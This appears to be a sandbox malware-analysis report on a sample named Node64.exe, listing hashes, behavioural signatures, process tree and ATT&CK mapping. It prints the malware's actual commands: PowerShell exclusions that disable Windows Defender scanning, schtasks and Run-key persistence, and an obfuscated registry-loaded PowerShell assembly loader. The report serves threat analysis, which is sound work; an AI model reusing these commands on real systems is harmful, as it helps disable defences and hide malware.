Overview
overview
10Static
static
3tmpfile-ma...r3.exe
windows7-x64
8tmpfile-ma...r3.exe
windows10-2004-x64
8tmpfile-ma...rm.exe
windows7-x64
10tmpfile-ma...rm.exe
windows10-2004-x64
10tmpfile-ma...ir.exe
windows7-x64
10tmpfile-ma...ir.exe
windows10-2004-x64
10tmpfile-ma...32.exe
windows7-x64
10tmpfile-ma...32.exe
windows10-2004-x64
10tmpfile-ma...63.exe
windows7-x64
3tmpfile-ma...63.exe
windows10-2004-x64
3tmpfile-ma...64.exe
windows7-x64
10tmpfile-ma...64.exe
windows10-2004-x64
10tmpfile-ma...ox.exe
windows7-x64
7tmpfile-ma...ox.exe
windows10-2004-x64
7tmpfile-ma...7I.exe
windows7-x64
1tmpfile-ma...7I.exe
windows10-2004-x64
1tmpfile-ma...8I.exe
windows7-x64
7tmpfile-ma...8I.exe
windows10-2004-x64
7Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 17:33
Static task
static1
Behavioral task
behavioral1
Sample
tmpfile-main/0000000r00d000r3.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
tmpfile-main/0000000r00d000r3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
tmpfile-main/Exterm.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
tmpfile-main/Exterm.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
tmpfile-main/Gaming Chair.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
tmpfile-main/Gaming Chair.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
tmpfile-main/Node32.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
tmpfile-main/Node32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
tmpfile-main/Node63.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
tmpfile-main/Node63.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
tmpfile-main/Node64.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
tmpfile-main/Node64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
tmpfile-main/Sobfox.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
tmpfile-main/Sobfox.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
tmpfile-main/stTfuo7I.exe
Resource
win7-20241023-en
Behavioral task
behavioral16
Sample
tmpfile-main/stTfuo7I.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
tmpfile-main/stTfuo8I.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
tmpfile-main/stTfuo8I.exe
Resource
win10v2004-20241007-en
General
-
Target
tmpfile-main/Node64.exe
-
Size
368KB
-
MD5
47fe2649cc2325a477fce08731aeb716
-
SHA1
268abf2cceac62263fe040dc40b8b4b9aa3592da
-
SHA256
d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b
-
SHA512
173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4
-
SSDEEP
6144:dClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDN9gkHp683KX:dUolitMIaAFkh6
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid Process procid_target PID 2348 created 432 2348 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpid Process 1580 powershell.exe 2800 powershell.exe 1608 powershell.exe 2348 powershell.EXE -
Executes dropped EXE 3 IoCs
Processes:
$Node32.exe$Node2Json.exe$Node3Json.exepid Process 2860 $Node32.exe 1268 $Node2Json.exe 1900 $Node3Json.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
Node64.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" Node64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" Node64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" Node64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
Node64.exeWMIADAP.EXEpowershell.EXEdescription ioc Process File created C:\Windows\System32\$Node3Json.exe Node64.exe File opened for modification C:\Windows\System32\$Node3Json.exe Node64.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\System32\$Node32.exe Node64.exe File opened for modification C:\Windows\System32\$Node32.exe Node64.exe File created C:\Windows\System32\$Node2Json.exe Node64.exe File opened for modification C:\Windows\System32\$Node2Json.exe Node64.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid Process procid_target PID 2348 set thread context of 1688 2348 powershell.EXE 50 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
$Node32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $Node32.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d03b97ee1639db01 powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 1792 schtasks.exe 2288 schtasks.exe 2480 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid Process 1580 powershell.exe 2800 powershell.exe 1608 powershell.exe 2348 powershell.EXE 2348 powershell.EXE 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe 1688 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
Node64.exepowershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe$Node2Json.exe$Node3Json.exesvchost.exedescription pid Process Token: SeDebugPrivilege 2636 Node64.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 2348 powershell.EXE Token: SeDebugPrivilege 2348 powershell.EXE Token: SeDebugPrivilege 1688 dllhost.exe Token: SeDebugPrivilege 1268 $Node2Json.exe Token: SeDebugPrivilege 1900 $Node3Json.exe Token: SeAuditPrivilege 848 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Node64.exetaskeng.exepowershell.EXEdllhost.exelsass.exedescription pid Process procid_target PID 2636 wrote to memory of 1580 2636 Node64.exe 32 PID 2636 wrote to memory of 1580 2636 Node64.exe 32 PID 2636 wrote to memory of 1580 2636 Node64.exe 32 PID 2636 wrote to memory of 2288 2636 Node64.exe 34 PID 2636 wrote to memory of 2288 2636 Node64.exe 34 PID 2636 wrote to memory of 2288 2636 Node64.exe 34 PID 2636 wrote to memory of 2860 2636 Node64.exe 36 PID 2636 wrote to memory of 2860 2636 Node64.exe 36 PID 2636 wrote to memory of 2860 2636 Node64.exe 36 PID 2636 wrote to memory of 2860 2636 Node64.exe 36 PID 2636 wrote to memory of 2800 2636 Node64.exe 37 PID 2636 wrote to memory of 2800 2636 Node64.exe 37 PID 2636 wrote to memory of 2800 2636 Node64.exe 37 PID 2636 wrote to memory of 2480 2636 Node64.exe 41 PID 2636 wrote to memory of 2480 2636 Node64.exe 41 PID 2636 wrote to memory of 2480 2636 Node64.exe 41 PID 2712 wrote to memory of 2348 2712 taskeng.exe 40 PID 2712 wrote to memory of 2348 2712 taskeng.exe 40 PID 2712 wrote to memory of 2348 2712 taskeng.exe 40 PID 2636 wrote to memory of 1268 2636 Node64.exe 44 PID 2636 wrote to memory of 1268 2636 Node64.exe 44 PID 2636 wrote to memory of 1268 2636 Node64.exe 44 PID 2636 wrote to memory of 1608 2636 Node64.exe 45 PID 2636 wrote to memory of 1608 2636 Node64.exe 45 PID 2636 wrote to memory of 1608 2636 Node64.exe 45 PID 2636 wrote to memory of 1792 2636 Node64.exe 47 PID 2636 wrote to memory of 1792 2636 Node64.exe 47 PID 2636 wrote to memory of 1792 2636 Node64.exe 47 PID 2636 wrote to memory of 1900 2636 Node64.exe 49 PID 2636 wrote to memory of 1900 2636 Node64.exe 49 PID 2636 wrote to memory of 1900 2636 Node64.exe 49 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 2348 wrote to memory of 1688 2348 powershell.EXE 50 PID 1688 wrote to memory of 432 1688 dllhost.exe 5 PID 1688 wrote to memory of 476 1688 dllhost.exe 6 PID 1688 wrote to memory of 492 1688 dllhost.exe 7 PID 1688 wrote to memory of 500 1688 dllhost.exe 8 PID 1688 wrote to memory of 596 1688 dllhost.exe 9 PID 1688 wrote to memory of 672 1688 dllhost.exe 10 PID 1688 wrote to memory of 760 1688 dllhost.exe 11 PID 1688 wrote to memory of 816 1688 dllhost.exe 12 PID 1688 wrote to memory of 848 1688 dllhost.exe 13 PID 1688 wrote to memory of 968 1688 dllhost.exe 15 PID 1688 wrote to memory of 272 1688 dllhost.exe 16 PID 1688 wrote to memory of 1044 1688 dllhost.exe 17 PID 1688 wrote to memory of 1052 1688 dllhost.exe 18 PID 1688 wrote to memory of 1120 1688 dllhost.exe 19 PID 1688 wrote to memory of 1136 1688 dllhost.exe 20 PID 1688 wrote to memory of 1184 1688 dllhost.exe 21 PID 1688 wrote to memory of 2044 1688 dllhost.exe 23 PID 1688 wrote to memory of 1344 1688 dllhost.exe 24 PID 1688 wrote to memory of 1492 1688 dllhost.exe 25 PID 1688 wrote to memory of 576 1688 dllhost.exe 26 PID 1688 wrote to memory of 2264 1688 dllhost.exe 27 PID 1688 wrote to memory of 2332 1688 dllhost.exe 30 PID 492 wrote to memory of 1268 492 lsass.exe 44 PID 492 wrote to memory of 1268 492 lsass.exe 44 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{dfba5e1d-6538-4ca6-bb03-60e6f045a06d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1344
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1492
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:2332
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1120
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
PID:2508
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AB3124F7-8FEB-4D00-83F7-6C8C103F6F6A} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+'$'+'No'+[Char](100)+''+[Char](101)+''+'s'+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:272
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1044
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1052
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1136
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:576
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2264
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"2⤵
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2288
-
-
C:\Windows\System32\$Node32.exe"C:\Windows\System32\$Node32.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2480
-
-
C:\Windows\System32\$Node2Json.exe"C:\Windows\System32\$Node2Json.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1792
-
-
C:\Windows\System32\$Node3Json.exe"C:\Windows\System32\$Node3Json.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-436168471-1206241428-9196417204677608506989717191518734707-994009876-1861237981"1⤵PID:2340
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5398e188aa00933fa6a4d11bfaa0dfb29
SHA16f8a8010a25fbb353900ea29b85aac3c53bba69b
SHA256a55268b476ab76e1e0ced63519958d511fcd4f90b24ee805211b8807f7d7dd20
SHA51283604b520f1d4ecf97deaabf083eae6c7907af66c2d1edededaaeb4feda9cb150774212e926c5856f56eb33d2a4db65ee6be960681fcc15c20c4e682d10073a0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SS8D8ZPBN23OOLZBJKL2.temp
Filesize7KB
MD5d550a095b25add93e6c16a2394fb674a
SHA16ee8508d2a25a8c1de5bc3958e41003ba5f14c93
SHA25693058c7487f12c83c78486218cf8219c1439c97f323a056eea7eec871006fcef
SHA512d3cce7650f67c77b18d896290b8c1919f75d48b5b531ca857f8a61abcaa0cce50cdecb6afb4ebd3a15cf43287bc39c2782f3129abd68a2b7c45f834ddd8f5f88
-
Filesize
116KB
MD541814c2aa6f0aaffaaaa26ffd07b3550
SHA1ea9731c42a382ed003b5b4bfd28c3ba437c8d14a
SHA256da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e
SHA512f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d
-
Filesize
163KB
MD5b850f016450d68da0ae4bb945355f70c
SHA1521726c38af715e6ee1c76315151f0ed9518c6f4
SHA2568a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24
SHA51230f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c
-
Filesize
117KB
MD5391d4f99d0076ce566b370f1572ef670
SHA10bf04beb77440315098bacf30563a6542e254a45
SHA256b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605
SHA5121952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e